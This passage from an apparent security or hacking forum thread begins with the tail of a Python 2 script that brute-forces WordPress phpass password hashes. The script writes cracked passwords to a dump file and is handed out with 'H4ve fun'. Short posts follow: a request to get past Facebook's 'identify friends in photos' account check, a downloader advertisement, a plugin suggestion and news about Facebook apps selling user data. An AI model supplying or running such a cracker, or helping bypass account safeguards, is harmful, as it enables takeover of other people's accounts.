                    wordLastChar = self.charSet[0] # reset last char to the first character from the char set
                    wordLeftSide = self._incWord(wordLeftSide) # send left side to be increased
                return wordLeftSide + wordLastChar # return the next word

        # check if the hashes are of the right type
        for wpHash in wpHashList:
            if wpHash[0:3] != '$P$':
                print "Wrong password type or password type is DES not impemented yet!"
                exit()

        # create a new wordGenerator
        newWord = wordGenerator ('',charSet); # word generator
        wordsFound = 0
        exitLoop = False

        def found(hashItem, word):
            global wordsFound
            global exitLoop
            d = open(dumpFile,'a') # open file for append
            d.write(hashItem + ' = ' + word +"\n") # write the result
            d.close() # close file
            wordsFound = wordsFound + 1 # increase the number of hashes cracked
            print hashItem + ' = ' + word # display the word
            if wordsFound == len(wpHashList): # if the number of hashes cracked equals the number of hashes in the list
                exitLoop = True # raise flag to stop the loop and exit

        def setProgress(word) :
            d = open(progFile,'w') # open file for writing (overwrites the previous position)
            d.write("Position :"+ word +"\n") # write the current word
            d.close() # close file

        count = 0
        while exitLoop == False:
            word = newWord.nextWord()
            count = count + 1
            #print word
            for wpHash in wpHashList:
                newHash = crypt_private(word,wpHash)
                if wpHash == newHash :
                    found(newHash,word)
            if count == 1000 :
                count = 0
                setProgress(word)

    H4ve fun :D:D
  17. I don't know if this belongs in the HELP category, but the question fits better here: is there any way to get past the Facebook roadblock? I'm referring strictly to the "identify friends in photos" part. If you know the answer, please reply. If not, other questions are pointless. Thank you.
  18. Whoever wants, send a PM
  19. A super, unique downloader has opened. You can download TV series from vplay.ro, music and video from youtube, trilulilu, plus many other useful sites. A unique project, with no waiting time for downloads and no ads. I hope it will be useful to you. Read more here: BestDownloadeR.NeT - The unique multi-downloader has opened its "gates" | CosminKenT.NeT
  20. Since Facebook has ended up being everywhere, I thought it would be a good idea to implement a plugin for posts with a "Like" button and to create a Facebook page for the site. These would be effective ways of growing RST's user base. What do you say?
  21. It doesn't surprise anyone anymore, does it? After numerous security bugs and shortcomings in the privacy settings were brought to light recently, another piece of news has appeared about a top Facebook application selling some users' data. Facebook says it's nothing; no more than a dozen applications authorized by them and considered top ones do this routinely. Facebook App Developers Sold User Data…Shock! An Update on Facebook UIDs - Facebook Developers